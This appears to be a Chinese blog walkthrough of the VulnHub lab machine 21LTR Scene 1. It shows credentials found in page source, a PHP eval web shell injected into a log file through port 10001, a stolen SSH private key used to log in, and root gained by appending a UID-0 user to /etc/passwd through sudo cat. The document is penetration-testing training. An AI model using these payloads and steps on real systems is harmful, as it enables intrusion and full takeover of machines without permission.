靶机下载链接:https://www.vulnhub.com/entry/21ltr-scene-1,3/
一、靶机搭建
将靶机调到仅主机模式我这边是自己做了一张仅主机的网卡
靶机的IP显示
二,端口扫描
给kali也添加一个仅主机的网卡namp 192.168.2.120
发现开启21、22、80、10001端口
三、访问80端口
![](https://img-blog.csdnimg.cn/img_convert/ccda102e280175835cdd30c382cb4d97.png)我们扫描一下目录
找不到什么有用的信息
我们F12看一下网络源码
发现一个用户和密码
logs #账号
zg]E-b0]+8:(58G #密码
然后根据上面扫描到的端口,尝试进行连接
发现ftp连接成功
查看一下当前文件
发现有个文件,下载下来看看
get backup_log.php /home/kali/Desktop/1.php
cat 1.php
发现是日志文件
我们想起来刚刚目录探测有一个logs目录,我们尝试访问
http://192.168.2.120/logs/backup_log.php
get shell
因为这是日志文件,我们尝试一句话木马写入我们这里尝试利用10001端口写入
telnet 192.168.2.120 10001
<?php eval($_POST[qxq]);?>
这边 10001有点不好连,一直尝试连接就好,总能连上的,相信自己
再次查看日志文件
发现有我们的东西,然后开始蚁剑连接
连接成功,进去查看/etc/passwd敏感信息
考虑到有ssh服务,我们可以使用密钥免密登录
读取密钥 /media/USB_1/Stuff/Keys/id_rsa
保存到本机上
这个时候,把这个id_rsa拖到kali里面
赋予id_rsa读写权限
chmod 600 id_rsa
然后ssh登入
ssh -i id_rsa hbeale@192.168.2.120
发现报错,我们修改config文件
cd ~/.ssh
vim config
添加
Host *
HostKeyAlgorithms +ssh-rsa
这个时候
弹出了这个问题
进行解决
cd ~/.ssh
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config
再次尝试连接
连接成功
创建用户密码openssl命令生成密码
openssl passwd 123456
创建用户,创建完成后Ctrl+c退出
sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash
切换用户,查看是否提权成功
su aroot
密码:123456
id
whoami
提权成功